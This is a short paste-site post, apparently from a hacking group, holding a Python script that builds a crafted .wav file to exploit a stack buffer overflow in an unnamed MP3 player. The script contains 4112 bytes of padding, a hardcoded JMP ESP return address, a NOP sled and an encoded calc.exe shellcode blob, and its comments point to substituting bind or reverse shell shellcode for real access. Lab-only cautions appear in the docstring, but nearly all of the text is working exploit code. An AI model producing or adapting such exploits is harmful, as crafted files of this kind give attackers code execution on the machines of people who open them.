SERBIANHACKERS

SRBTOOL | MP3 Exploit

Apr 16th, 2017
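#!/usr/bin/env python
"""Build a proof-of-concept .wav file for a stack buffer overflow in an MP3 player.

Layout of the generated ``exploit.wav``::

    [4112 x 'A'][saved EIP -> JMP ESP][10 x NOP][shellcode]

The 4112-byte padding and the JMP ESP address are specific to the target
application and to the one kernel32.dll build they were taken from; the page
this script comes from does not identify either.  Re-derive both on your own
target (EIP-overwrite verification with a unique pattern, then a JMP ESP
gadget from a non-ASLR module) before relying on them.

Only open the generated file with the target application inside an isolated
lab VM.  The script runs with Python 2 or 3 and writes the payload in binary
mode so the file is byte-exact.
"""
import struct

filename = "exploit.wav"

# Bytes needed to reach the saved return address on the stack (target-specific).
fill = b"A" * 4112

# eip = struct.pack('<I', 0x42424242)  # EIP overwrite verification ("BBBB")
# Return-address overwrite: a JMP ESP gadget in Kernel32.dll (32-bit process,
# little-endian).  Only valid for the one non-ASLR kernel32.dll build it was
# found in -- confirm the address on the target (debugger / mona) before use.
eip = struct.pack('<I', 0x7C874413)

# Short NOP sled between the gadget and the payload.  Encoded payloads usually
# start with a decoder stub that scribbles just below ESP (e.g. the fnstenv
# GetPC trick), so a little slack keeps the first payload bytes intact.
offset = b"\x90" * 10

# Bytes available after the return address for offset + shellcode.  Anything
# larger is truncated/corrupted on the target, so build_exploit() enforces it.
available_shellcode_space = 320

# Pop-up calc.exe payload used as the proof of concept.  This is an opaque,
# pre-encoded blob copied from a paste (the \xd9\x74\x24\xf4 fnstenv sequence
# near the start looks like an msfvenom-style polymorphic decoder stub).
# Treat it as untrusted: disassemble it or regenerate it yourself before
# executing anything built from it.
calc = (b"\xba\x86\x2c\x9a\x7b\xd9\xc2\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
        b"\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\x89\xce\x6f\x87\x7d\x8c"
        b"\x90\x78\x7d\xf1\x19\x9d\x4c\x31\x7d\xd5\xfe\x81\xf5\xbb\xf2"
        b"\x6a\x5b\x28\x81\x1f\x74\x5f\x22\x95\xa2\x6e\xb3\x86\x97\xf1"
        b"\x37\xd5\xcb\xd1\x06\x16\x1e\x13\x4f\x4b\xd3\x41\x18\x07\x46"
        b"\x76\x2d\x5d\x5b\xfd\x7d\x73\xdb\xe2\x35\x72\xca\xb4\x4e\x2d"
        b"\xcc\x37\x83\x45\x45\x20\xc0\x60\x1f\xdb\x32\x1e\x9e\x0d\x0b"
        b"\xdf\x0d\x70\xa4\x12\x4f\xb4\x02\xcd\x3a\xcc\x71\x70\x3d\x0b"
        b"\x08\xae\xc8\x88\xaa\x25\x6a\x75\x4b\xe9\xed\xfe\x47\x46\x79"
        b"\x58\x4b\x59\xae\xd2\x77\xd2\x51\x35\xfe\xa0\x75\x91\x5b\x72"
        b"\x17\x80\x01\xd5\x28\xd2\xea\x8a\x8c\x98\x06\xde\xbc\xc2\x4c"
        b"\x21\x32\x79\x22\x21\x4c\x82\x12\x4a\x7d\x09\xfd\x0d\x82\xd8"
        b"\xba\xe2\xc8\x41\xea\x6a\x95\x13\xaf\xf6\x26\xce\xf3\x0e\xa5"
        b"\xfb\x8b\xf4\xb5\x89\x8e\xb1\x71\x61\xe2\xaa\x17\x85\x51\xca"
        b"\x3d\xe6\x34\x58\xdd\xc7\xd3\xd8\x44\x18")

# Place for the real shellcode (bind/reverse shell).  Must be bytes, not a
# tuple, so it can be concatenated; it has to fit available_shellcode_space.
shell = b""


def build_exploit(shellcode=calc):
    """Return the exploit file contents: fill + eip + offset + shellcode.

    Args:
        shellcode: payload bytes placed directly after the NOP sled.

    Returns:
        The complete file contents as bytes.

    Raises:
        ValueError: if offset + shellcode does not fit in
            ``available_shellcode_space`` (the overflow would otherwise
            silently truncate the payload on the target).
    """
    used = len(offset) + len(shellcode)
    if used > available_shellcode_space:
        raise ValueError(
            "payload needs %d bytes but only %d are available after EIP"
            % (used, available_shellcode_space)
        )
    return fill + eip + offset + shellcode


# Loader for the simple proof of concept (calc.exe shellcode).
exploit = build_exploit(calc)
# exploit = build_exploit(shell)  # loader for real shell access


if __name__ == "__main__":
    # Binary mode is essential: text mode newline-translates 0x0A on Windows
    # and, on Python 3, UTF-8-encodes every byte >= 0x80, corrupting the payload.
    with open(filename, "wb") as out:
        out.write(exploit)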